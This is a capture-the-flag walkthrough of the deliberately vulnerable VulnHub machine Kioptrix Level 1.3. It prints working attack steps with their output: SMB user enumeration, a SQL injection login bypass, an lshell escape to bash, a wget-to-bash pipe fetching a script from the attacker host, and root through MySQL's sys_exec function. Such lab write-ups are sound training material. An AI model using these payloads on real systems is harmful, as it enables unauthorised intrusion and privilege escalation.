Name : Kioptrix Level 1.3 (Level 4) Difficulty : Beginner Type : boot2root Source : VulnHub URL : https://www.vulnhub.com/entry/kioptrix-level-13-4,25/ Entry : 6 / 30

Welcome to the walkthrough for Kioptrix Level 1.3 (#4), a boot2root CTF found on VulnHub. This is the sixth VM in my VulnHub Challenge! This is also the fourth VM in a family of CTF challenges on VulnHub called Kioptrix. This series is considered a great starting point for CTFs in the boot2root family. Ignoring the naming convention and the age of these challenges, they are still a lot of fun to do and still have a lot to teach.

Goal

For this particular entry in the series, there is a flag file in the /root directory that we can read once we gain access to the root user.

Setup

I’m using VMWare Workstation Player to host Kali and the Kioptrix Level 1.3 (#4) image, with both VMs running in a NAT network. Now this one was a bit involved compared to the other VMs I’ve done thus far since it only comes in a VMWare image. Rather than go through all the details, here are the highlights:

I used Debian 7.x (32 bit) as the base OS to install

I created the VM, then deleted the existing hard disk and replaced it with the Kioptrix 1.3 (#4) one downloaded from the link above. To change the hard disk, go to the VM -> Settings… menu and you’ll see the entry for the Hard Drive in the list of components. After removing the existing one, create a new one (use the Add… button at the bottom), select SCSI as the type, then select Use an existing virtual disk, click Next and browse to the virtual disk you downloaded from VulnHub.

I ensured the network was set to NAT on both Kali and Kioptrix 1.3 (#4) and booted both of them up.

That’s it! The hardest part is finding the Hard Disk and adding a new one. I’ve encountered other VMs like this on VulnHub, so this isn’t as uncommon as you may think.

Discovery

I use netdiscover to search for the IP address of the Kioptrix Level 1.3 (#4) VM:

root@dante:~# netdiscover -r 192.168.127.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.127.1 00:50:56:c0:00:08 1 60 VMware, Inc. 192.168.127.2 00:50:56:e9:f5:d4 1 60 VMware, Inc. 192.168.127.132 00:0c:29:ba:9d:e5 1 60 VMware, Inc. 192.168.127.254 00:50:56:f5:1f:23 1 60 VMware, Inc.

So it looks like 192.168.127.132 is our target, as the others are used by VMWare for various networking tasks (gateway, etc.).

Scanning

I’ll start with a quick nmap scan to look for open ports, then do a second scan that does a deeper dive into the services behind the open ports using the -sC and -sV flags:

root@dante:~# nmap 192.168.127.132 Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-19 19:53 EDT Nmap scan report for 192.168.127.132 Host is up (0.00045s latency). Not shown: 566 closed ports, 430 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:BA:9D:E5 (VMware) Nmap done: 1 IP address (1 host up) scanned in 2.57 seconds root@dante:~# nmap -sC -sV -p22,80,139,445 192.168.127.132 Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-19 19:54 EDT Nmap scan report for 192.168.127.132 Host is up (0.00062s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA) |_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP) MAC Address: 00:0C:29:BA:9D:E5 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 2h00m05s, deviation: 2h49m43s, median: 4s |_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.28a) | Computer name: Kioptrix4 | NetBIOS computer name: | Domain name: localdomain | FQDN: Kioptrix4.localdomain |_ System time: 2019-08-19T19:54:20-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.69 seconds

There are a few ports here that are interesting. I’m going to start with the simple enumeration first, namely SMB since we have ports 139 and 445 both open, and then move on to the website on port 80.

SMB Reconnaissance

I love nmap . Out of all the tools that I use, nmap is one of my favourites. On its own it is a pretty impressive port scanner, but combined with the Nmap Scripting Engine (NSE), it turns into a serious powerhouse. I used to use tools like enum4linux for my SMB scanning, but not anymore. Between something getting mixed up with smbclient on Kali sometime in 2018 (or maybe earlier, but that’s when I first encountered it), I’ve switched to using either nmap or Metasploit for my SMB scanning. In this instance I’m going to use some nmap scripts to check for open shares and users:

root@dante:~# nmap --script=smb-enum-* -p139,445 192.168.127.132 Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-19 20:20 EDT Nmap scan report for 192.168.127.132 Host is up (0.00088s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:BA:9D:E5 (VMware) Host script results: |_smb-enum-domains: ERROR: Script execution failed (use -d to debug) |_smb-enum-groups: ERROR: Script execution failed (use -d to debug) |_smb-enum-sessions: ERROR: Script execution failed (use -d to debug) | smb-enum-shares: | account_used: guest | \\192.168.127.132\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (Kioptrix4 server (Samba, Ubuntu)) | Users: 3 | Max Users: <unlimited> | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\192.168.127.132\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: <unlimited> | Path: C:\var\lib\samba\printers | Anonymous access: <none> |_ Current user access: <none> |_smb-enum-users: ERROR: Script execution failed (use -d to debug) Nmap done: 1 IP address (1 host up) scanned in 420.02 seconds

Hmm. Not exactly what I was hoping for! Your mileage may vary, but for me nmap is failing on getting me a list of domains, groups, sessions and users. I did try to debug this, but I didn’t get anywhere. Oh well, time to go back to Metasploit and try again. I’m curious about users more than anything, since I know this is a standalone machine.

root@dante:~# msfconsole ______________________________________________________________________________ | | | 3Kom SuperHack II Logon | |______________________________________________________________________________| | | | | | | | User Name: [ security ] | | | | Password: [ ] | | | | | | | | [ OK ] | |______________________________________________________________________________| | | | https://metasploit.com | |______________________________________________________________________________| =[ metasploit v5.0.41-dev ] + -- --=[ 1914 exploits - 1074 auxiliary - 330 post ] + -- --=[ 556 payloads - 45 encoders - 10 nops ] + -- --=[ 4 evasion ] msf5 > use auxiliary/scanner/smb/smb_enumusers msf5 auxiliary(scanner/smb/smb_enumusers) > set rhosts 192.168.127.132 rhosts => 192.168.127.132 msf5 auxiliary(scanner/smb/smb_enumusers) > run [+] 192.168.127.132:139 - KIOPTRIX4 [ nobody, robert, root, john, loneferret ] ( LockoutTries=0 PasswordMin=5 ) [*] 192.168.127.132: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/smb/smb_enumusers) >

There we go. Looks like we have a few users we can use:

nobody

robert

root

john

loneferret

We have ourselves a user list! This can definitely come in handy. Next up I’m going to try to connect to the IPC$ share, since it seems to be pointing to a tmp directory and it has anonymous access! Unfortunately when I try to connect, I get nothing:

root@dante:~# smbclient -N //192.168.127.132/IPC\$ Anonymous login successful Try "help" to get a list of possible commands. smb: \> dir NT_STATUS_NETWORK_ACCESS_DENIED listing \* smb: \> pwd Current directory is \\192.168.127.132\IPC$\ smb: \> q

Oh well, at least I have some usernames.

Web Reconnaissance

Let’s browse to the site and see what pops up:

Nice. A cute little login page. I check the source for the HTML, but nothing of interest is found. I decide to try the standard logins, like admin / admin , john / john , etc., but no luck. I then decide to go with what I know, namely the users I found from the SMB service above, and see if the site is susceptible to any SQL injection (SQLi) attacks. Turns out it is. When I use the username john and I set the password to ' or 1=1 -- - , I get the following:

Using robert with the same password gives me:

Yet when I move on to loneferret , I hit a wall:

No problem, I have two usernames and two passwords.

Note: The password for robert looks like it’s base64 encoded, but the one for john is not. Might be a red herring, i.e. the password for robert is the base64 encoded value. Wouldn’t be the first time I saw that. This is why it helps to enumerate everything that you can.

Let’s recap:

We have found usernames from the SMB service.

We have found passwords for two of those users via the web application on the server.

We have an open SSH port.

I think we know what we need to do. I’m going to try to log in as john via SSH and the password we discovered from the web app:

root@dante:~# ssh john@192.168.127.132 The authenticity of host '192.168.127.132 (192.168.127.132)' can't be established. RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.127.132' (RSA) to the list of known hosts. john@192.168.127.132's password: Welcome to LigGoat Security Systems - We are Watching == Welcome LigGoat Employee == LigGoat Shell is in place so you don't screw up Type '?' or 'help' to get the list of allowed commands john:~$ ? cd clear echo exit help ll lpath ls john:~$ ls john:~$ cd /var/www *** forbidden path -> "/var/www/" *** You have 0 warning(s) left, before getting kicked out. This incident has been reported. john:~$ lpath Allowed: /home/john john:~$ cd /home/robert *** forbidden path -> "/home/robert/" *** Kicked out Connection to 192.168.127.132 closed. root@dante:~#

Success? Kind of. Seems password reuse is a think for john (also for robert , but I’ll skip that for now), however we end up in a limited shell of some kind. As you can see, using 2 forbidden commands results in me getting disconnected. There isn’t anything in the directory we have, so we’re going to have to look into escaping a limited shell using whatever means we have. My first instinct is to look at the shell escapes listed here, but I had no luck.

Logging back in to the shell and just typing a few commands, I noticed something interesting:

root@dante:~# ssh john@192.168.127.132 john@192.168.127.132's password: Welcome to LigGoat Security Systems - We are Watching == Welcome LigGoat Employee == LigGoat Shell is in place so you don't screw up Type '?' or 'help' to get the list of allowed commands john:~$ asdf *** unknown command: asdf john:~$ which python *** unknown command: which john:~$ help cd clear echo exit help ll lpath ls john:~$ ? cd clear echo exit help ll lpath ls john:~$ lpath Allowed: /home/john john:~$ cd asdf lshell: asdf: No such file or directory john:~$

Wait, notice that error message? It’s prefixed with lshell , which may be our limited shell! Doing some more Google searches, I found this. Looks like there’s a bypass, so I’m going to try it:

john:~$ echo os.system('/bin/bash') john@Kioptrix4:~$ whoami john john@Kioptrix4:~$ ls -al total 28 drwxr-xr-x 2 john john 4096 2012-02-04 18:39 . drwxr-xr-x 5 root root 4096 2012-02-04 18:05 .. -rw------- 1 john john 61 2012-02-04 23:31 .bash_history -rw-r--r-- 1 john john 220 2012-02-04 18:04 .bash_logout -rw-r--r-- 1 john john 2940 2012-02-04 18:04 .bashrc -rw-r--r-- 1 john john 157 2019-08-19 20:58 .lhistory -rw-r--r-- 1 john john 586 2012-02-04 18:04 .profile john@Kioptrix4:~$

Success! I’ve managed to escape lshell and I’ve arrived at a nice bash shell instead. Time for enumeration!

Enumeration with LinEnum.sh

As I’ve done with the other machines in my challenge, I’m going to use the LinEnum.sh script to do my enumeration.

Note: I’ve updated my LinEnum.sh script to force the thorough tests option to always run. For CTFs, I always want the extra output so by forcing it within the script I don’t have to worry about forgetting to set the flag. This makes John a happy man.

I’ll start by hosting the script on my Kali machine using Python’s SimpleHTTPServer :

root@dante:/opt/LinEnum# python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ...

Note: I’m using the default port here since port 80 didn’t work the first time I tried it.

Next, I’ll go to my SSH session and download the script using wget , then port it to bash and review the output:

john@Kioptrix4:~$ wget -qO - http://192.168.127.131:8000/LinEnum.sh | bash ######################################################### # Local Linux Enumeration & Privilege Escalation Script # ######################################################### # www.rebootuser.com # version 0.97 [-] Debug Info [+] Thorough tests = Enabled Scan started at: Mon Aug 19 21:08:00 EDT 2019 ### SYSTEM ############################################## [-] Kernel information: Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux [-] Kernel information (continued): Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009 [-] Specific release information: DISTRIB_ID=Ubuntu DISTRIB_RELEASE=8.04 DISTRIB_CODENAME=hardy DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS" [-] Hostname: Kioptrix4 ### USER/GROUP ########################################## [-] Current user/group info: uid=1001(john) gid=1001(john) groups=1001(john) [-] Users that have previously logged onto the system: Username Port From Latest loneferret tty1 Mon Feb 6 20:05:44 -0500 2012 john pts/0 192.168.127.131 Mon Aug 19 21:00:46 -0400 2019 [-] Who else is logged on: 21:08:00 up 17 min, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT john pts/0 192.168.127.131 21:00 2.00s 0.06s 0.01s sshd: john [priv] <snip>

There’s a lot of output for this script, but I’m going to focus on a few key sections:

<snip> ### SOFTWARE ############################################# [-] Sudo version: Sudo version 1.6.9p10 [-] MYSQL version: mysql Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2 [+] We can connect to the local MYSQL service as 'root' and without a password! mysqladmin Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486 Copyright (C) 2000-2006 MySQL AB This software comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to modify and redistribute it under the GPL license Server version 5.0.51a-3ubuntu5.4 Protocol version 10 Connection Localhost via UNIX socket UNIX socket /var/run/mysqld/mysqld.sock Uptime: 17 min 38 sec Threads: 1 Questions: 53 Slow queries: 0 Opens: 24 Flush tables: 1 Open tables: 18 Queries per second avg: 0.050 <snip> [-] World-writable files (excluding /proc and /sys): -rw-rw-rw- 1 root root 12896 2012-02-04 10:08 /usr/lib/lib_mysqludf_sys.so <snip>

So there’s some interesting facts about MySQL in the output of LinEnum.sh . First off, we can connect to it using the root user without a password! Secondly is the version, which is 5.0.51a. Finally there is a lib_mysqludf_sys.so file on the file system. This will come in handy later, but for now we’ll just make note of it.

Exploring MySQL

Since we can log into MySQL as the root user without a password, let’s do some exploring:

john@Kioptrix4:/var/www$ mysql -uroot Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 15 Server version: 5.0.51a-3ubuntu5.4 (Ubuntu) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | members | | mysql | +--------------------+ 3 rows in set (0.00 sec) mysql> use members; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; +-------------------+ | Tables_in_members | +-------------------+ | members | +-------------------+ 1 row in set (0.00 sec) mysql> select * from members; +----+----------+-----------------------+ | id | username | password | +----+----------+-----------------------+ | 1 | john | MyNameIsJohn | | 2 | robert | ADGAdsafdfwt4gadfga== | +----+----------+-----------------------+ 2 rows in set (0.00 sec) mysql>

Great, we’ve found the two usernames and passwords that we retrieved via SQLi on the web application! This also explains why loneferret didn’t work, or root for that matter. While this is interesting, it doesn’t really provide any other useful information.

Escalating Privileges via MySQL

Remember that file lib_mysqludf_sys.so we saw earlier from the output of LinEnum.sh ? Well, it’s kind of special. If you read this article, you’ll understand why. In the MySQL 5.0 releases, there’s a way to actually execute OS level commands as the user you’ve logged into on MySQL via User Defined Functions (UDF). Since we have root access to MySQL, we should be able to run some OS commands accordingly.

I’m not going to explain the steps outlined in the article above, but here’s the output of what I did in MySQL:

mysql> use mysql Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> select * from func; +-----------------------+-----+---------------------+----------+ | name | ret | dl | type | +-----------------------+-----+---------------------+----------+ | lib_mysqludf_sys_info | 0 | lib_mysqludf_sys.so | function | | sys_exec | 0 | lib_mysqludf_sys.so | function | +-----------------------+-----+---------------------+----------+ 2 rows in set (0.00 sec) mysql> select sys_exec('usermod -a -G admin john'); +--------------------------------------+ | sys_exec('usermod -a -G admin john') | +--------------------------------------+ | NULL | +--------------------------------------+ 1 row in set (0.05 sec) mysql> exit Bye john@Kioptrix4:/var/www$ sudo su - [sudo] password for john: root@Kioptrix4:~# whoami root root@Kioptrix4:~# cd /root root@Kioptrix4:~# ls congrats.txt lshell-0.9.12 root@Kioptrix4:~#

Basically I checked for some user defined functions, found one that matched the article, and then I ran a usermod command to modify the current user ( john ) to be added to the admin group, which I knew was used by sudo .

Note: The output of LinEnum.sh included the contents of /etc/group , which showed that loneferret was a member of the admin group, so I figured it was a safe bet.

Once I added john to the appropriate group, it was just a matter of using sudo to escalate privileges.

Retrieve The Flag

All that’s left is to read the congrats.txt file:

root@Kioptrix4:~# cat congrats.txt Congratulations! You've got root. There is more then one way to get root on this system. Try and find them. I've only tested two (2) methods, but it doesn't mean there aren't more. As always there's an easy way, and a not so easy way to pop this box. Look for other methods to get root privileges other than running an exploit. It took a while to make this. For one it's not as easy as it may look, and also work and family life are my priorities. Hobbies are low on my list. Really hope you enjoyed this one. If you haven't already, check out the other VMs available on: www.kioptrix.com Thanks for playing, loneferret root@Kioptrix4:~#

Fin.